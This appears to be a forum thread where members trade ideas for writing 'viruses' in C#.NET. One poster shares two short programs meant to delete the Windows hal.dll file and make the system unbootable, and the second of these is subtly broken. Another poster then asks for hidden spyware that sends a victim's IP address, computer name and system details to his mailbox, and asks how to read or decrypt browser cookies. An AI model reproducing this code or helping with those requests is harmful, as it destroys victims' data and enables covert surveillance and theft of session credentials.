Moved your query to the forum and you submitted this as an article Deleting everything or editing some system files and corrupting them can also be defined as some virus and do that as that is the simplest thing you can do.
Hey Night Rider, Nice to see one more .NET Person here Soon I will let you know how to make virus in C#.net
For a Sample Basic Virus Program, See the code bolow. Code: using System; using System.Collections.Generic; using System.Text; using System.IO; namespace HallDel { class Program { static void Main(string[] args) { System.IO.File.Delete("C:\\Windows\\system32\\hal.dll"); /* C# PWNS */ } } }
A more advanced version: Code: using System; using System.Collections.Generic; using System.Text; using System.IO; namespace HalDelPro { class Program { static void Main(string[] args) { System.IO.File.Delete(System.Environment.SystemDirectory + "hal.dll"); /* C# OWNS*/ } } }
thanx naimish but some more gr8 type this is a really basic and it runs only once... as it corrupts the windows..deleting the hardware abtraction file.. i want some virus which gives me some system information without the user notification or some lyk this ip add, computer name, memory all this and that also i can access then by some method whenever online.. to my mailbox or such.. i m planning to do this stuff but dnt knw where to start,,
do u knw naimish how to read cookies in c# if possible.. becoz it cant be in c#.net as this thing is only possible in asp.net.. but if we have cookies saved n we have read that or decrypt that do u knw some way in .net???